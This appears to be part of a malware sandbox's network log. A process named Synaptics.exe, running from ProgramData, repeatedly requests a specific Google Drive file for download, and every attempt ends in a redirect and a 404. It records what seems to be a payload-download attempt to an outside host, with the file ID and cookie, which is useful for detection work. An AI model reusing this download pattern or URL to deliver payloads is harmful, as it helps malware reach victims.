                                                                                                                                                                            Data Ascii: 404 (Not Found)!!1</title><style nonce="wPmahF-m03rlP4N1q9M6XQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:49:41 UTC  122                IN
                                                                                                                                                                            Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
110         192.168.2.8  49880        142.250.185.78   443               7732  C:\ProgramData\Synaptics\Synaptics.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-30 10:49:42 UTC  344                OUT        GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
2024-12-30 10:49:42 UTC  1314               IN         HTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:42 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-CL0OYuTms7AppzWznxvGWw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
111         192.168.2.8  49881        142.250.185.78   443               7732  C:\ProgramData\Synaptics\Synaptics.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-30 10:49:42 UTC  344                OUT        GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
2024-12-30 10:49:42 UTC  1314               IN         HTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:42 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-KdbRyFLKm-PoAtLT0_YMZQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
112         192.168.2.8  49882        142.250.185.161  443               7732  C:\ProgramData\Synaptics\Synaptics.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-30 10:49:42 UTC  387                OUT        GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
2024-12-30 10:49:43 UTC  1243               IN         HTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC4Up9kJdGl2f_6u8XE9-SjIQV7Oz-cOixI9wc8-mV9solDlqGx8m9ligb_VlbQR-vlJ
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:42 GMT
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-MLp9LyF43cM-joHmVzG5Dw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
2024-12-30 10:49:43 UTC  147                IN
                                                                                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:49:43 UTC  1390               IN
                                                                                                                                                                            Data Ascii: t Found)!!1</title><style nonce="dZwYMr05fZ8EL8QD1Waf3w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:49:43 UTC  115                IN
                                                                                                                                                                            Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
113         192.168.2.8  49884        142.250.185.161  443               7732  C:\ProgramData\Synaptics\Synaptics.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-30 10:49:42 UTC  387                OUT        GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
2024-12-30 10:49:43 UTC  1243               IN         HTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC6VkEvHbZos701eT0OGTOWSVT8PbAfv4kMwHaqCFzimZpN2ef6sCO9TD4sCQ6pKz4CR
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:43 GMT
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-S_68dQhXVHsYkNKLLBBgXQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
2024-12-30 10:49:43 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:49:43 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="PjlcCJn6ASADLlAtEr0onA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:49:43 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
114 | 192.168.2.8 | 49885 | 142.250.185.78 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:49:43 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
2024-12-30 10:49:43 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:43 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-DdnYAofk-IqbSZvVr38FzA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
115 | 192.168.2.8 | 49886 | 142.250.185.78 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:49:43 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
116 | 192.168.2.8 | 49887 | 142.250.185.161 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:49:43 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
2024-12-30 10:49:44 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC6gfgsg9caI1RW8in2-UWqvpFgCANcOGvJ4BEF6CnaBOCT2Ek3FukjJcYqidXhAW_5I
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:43 GMT
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-SwJMLa3viKzdOXhX68BPBw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
2024-12-30 10:49:44 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:49:44 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="IC6fUbNO7G6BEn8U8lOqCw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:49:44 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
117 | 192.168.2.8 | 49891 | 142.250.185.78 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:49:44 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
2024-12-30 10:49:44 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:44 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-Il1QkrL4TNjN-KZyLk68ZQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                            118 | 192.168.2.8 | 49892 | 142.250.185.161 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-12-30 10:49:44 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:44 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC6ipvl2OuaXA-EONjzF8TjaTuY7bPFrzdpEMXAtoApcUjov7GHF53uavlxoAWHI-9Yf
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:44 GMT
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-BlXMELQcQaqmM58x89caGw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-12-30 10:49:44 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                            2024-12-30 10:49:44 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="uahkuh4mPTt8nRx-By9qSg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                            2024-12-30 10:49:44 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                            119 | 192.168.2.8 | 49893 | 142.250.185.78 | 443 | 7732 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-12-30 10:49:44 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:44 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:44 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-cEtsc7iOi1m0XMyv_tJM1Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
